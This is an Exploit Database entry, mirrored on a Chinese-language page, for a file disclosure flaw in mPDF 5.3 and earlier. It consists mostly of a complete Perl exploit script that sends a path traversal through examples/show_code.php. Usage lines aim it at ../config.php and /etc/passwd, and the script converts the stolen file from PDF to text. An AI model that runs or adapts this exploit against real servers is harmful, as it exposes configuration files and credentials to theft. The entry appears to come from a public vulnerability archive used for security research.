mPDF 5.3 – File Disclosure

• Exploit Database
• 9 阅读

• 作者： ZadYree
  日期： 2011-12-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18248/

• # Exploit Title: mPDF <= 5.3 File Disclosure
  # Google Dork: Please no dork
  # Date: 16th December 2011
  # Author: ZadYree
  # Software Link: http://www.mpdf1.com/mpdf/download
  # Version: 5.3 and prior
  # Tested on: Multiple
  # CVE : N/A
  
  #!/usr/bin/perl -U
  =head1 TITLE
  
  mPDF <= 5.3 File Disclosure Exploit (0day)
  
  =head2 SYNOPSIS
  
  -- examples/show_code.php --
  
  preg_match('/example[0]{0,1}(\d+)_(.*?)\.php/',$filename,$m); <--- URI unproperly filtered.
  $num = intval($m[1]);
  $title = ucfirst(preg_replace('/_/',' ',$m[2]));
  
  if (!$num || !$title) { die("Invalid file"); }
  
  =head2 DESCRIPTION
  
  This vulnerability, due to a weak filter, lets you download any unprotected remote 
  content, under PDF format.
  The exploit may not work, depending on the set up htaccess/chmod rules on the 
  remote server.
  
  =head2 USAGE
  
  perl exploit.pl -r http://p00niez.com/mpdf53/ ../config.php
  perl exploit.pl -a http://p00niez.com/mpdf53/ /etc/passwd
  
  Requiered modules:
  PDF::OCR2
  LWP::Simple
  File::Type
  
  Download a module:
  sudo cpan -fi install Module::Name
  
  =head3 Author
  
  Zadyree ~ 3LRVS Team | Blog: z4d.tuxfamily.org/blog
  
  =head3 Thanks
  
  PHDays CTF - Yes, CTFs sometime do give you 0dayz
  3LRVS Team - Support
  
  =cut
  
  #************* Configuration **************#
  my $pdf_file = '/tmp/b00m.pdf';
  $PDF::OCR2::CHECK_PDF = 0;
  $del_temp_file = 1;
  #******************************************#
  
  
  use 5.010;
  use PDF::OCR2;
  use Getopt::Std;
  use LWP::Simple;
  use File::Type;
  use constant TRUE => 1;
  use constant FALSE => 0;
  
  help() unless (@ARGV >= 2);
  
  my (%optz, $uri);
  getopts('rah', \%optz);
  my $relative = $optz{'r'};
  my $absolute = $optz{'a'};
  my $help = $optz{'h'};
  help() unless ($absolute || $relatife);
  
  my ($purl, $fpath) = @ARGV;
  
  my $name = $purl;
  $name =~ s{http://(.+?)/.*} {$1};
  $name .= ("_" . localtime(time) . ".txt");
  
  
  $uri = '/examples/show_code.php?filename=example03_LRVS.php/../../../../../../../../' if ($absolute);
  $uri = '/examples/show_code.php?filename=example03_LRVS.php/../../' if ($relative);
  
  help() unless ($uri);
  
  my $furl = $purl . $uri . $fpath;
  $furl =~ s#(//)#$i++?"/":$1#eg; # Yeah that's twisted.
  
  say "[*]Retrieving content...";
  my $file = make_file(get($furl));
  die "[-]The stream you requested is not well formatted (forbidden page, etc).\012" unless is_pdf($file);
  
  say "[+]OK\012[*]Converting format...";
  $pdf = PDF::OCR2->new($file);
  
  my $text = $pdf->text;
  $text =~ s/[^\x0A-\x7F]+?//gm;
  
  open(my $fh, '>', $name);
  print $fh $text;
  close($fh);
  
  say "[+]OK\012[+]Content successfully extracted!\nFile: ", $name;
  
  unlink($pdf_file) if ($del_temp_file == TRUE);
  
  
  
  sub make_file {
  	my $content = shift;
  	open($fh, '>', $pdf_file);
  	print $fh $content;
  	close($fh);
  	return($pdf_file);
  }
  
  sub is_pdf {
  	my $checked_file = shift;
  	my $ft = File::Type->new();
  	return(1) if ($ft->mime_type($checked_file) eq "application/pdf");
  	return(0);
  }
  
  help() if ($help);
  
  sub help {
  	say <<"EOF";
  
  Usage: perl $0 [-r|-a] http://[mPDF URL] <file_to_read>
  
  Details: 
   -r : Relative path (ex: ../file.php)
   -a : Absolute path (ex: /etc/file.zd)
  
  For any more information, feel free to contact ZadYree
  Happy hacking!
  EOF
  	exit(0);
  }